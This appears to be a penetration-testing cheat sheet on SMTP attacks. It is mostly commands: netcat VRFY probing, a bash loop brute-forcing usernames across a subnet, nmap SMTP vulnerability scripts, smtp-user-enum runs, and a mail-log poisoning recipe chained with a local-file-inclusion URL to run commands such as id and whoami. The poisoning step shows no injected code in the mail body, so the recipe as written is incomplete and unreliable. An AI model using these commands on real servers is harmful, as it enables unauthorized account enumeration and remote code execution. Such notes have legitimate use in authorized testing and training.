# SMTP Enum ### CheckList * Check for version * LFI chaining log file poisoning * User enumeration ### Grab the banner and VRFY ``` nc -nv 10.11.12.8 25 VRFY bob 250 2.1.5 bob@redhat.active.com <--- Output if user exists VRFY idontexist 550 5.1.1 idontexist... User unknow <--- Output if user does not exist ``` **EXPN request:** asks the server for the membership of a mailing list ### Bash Script for SMTP ``` #!/bin/bash # VRFY Script ############# for ips in $(cat numbers.txt); # numbers.txt list of IP's do for user in $(cat users.txt); # users.txt list of usernames do echo VRFY $user | nc -nv -w 1 10.11.1.$ips 25 2>/dev/null |grep ^"250" done done ``` ### SMTP nmap scripts ``` nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.0.0.1 ``` ### **SMTP user enum** ``` smtp-user-enum -M VRFY -D domain.here -u username -t 10.10.10.10 smtp-user-enum -M VRFY -U usernamelist.txt -t 10.10.10.10 ``` ### **Code Execution through SMTP/LFI** ``` telnet 10.10.10.10 25 EHLO sub.somedomain.com VRFY username@localhost mail from:someself@nodomain.io rcpt to: username@localhost data Subject: Some Subject . ================================================= After this and on the LFI you have discovered just place the variable cmd: ?cmd=id &cmd=id Examples: http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=id http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=whoami ```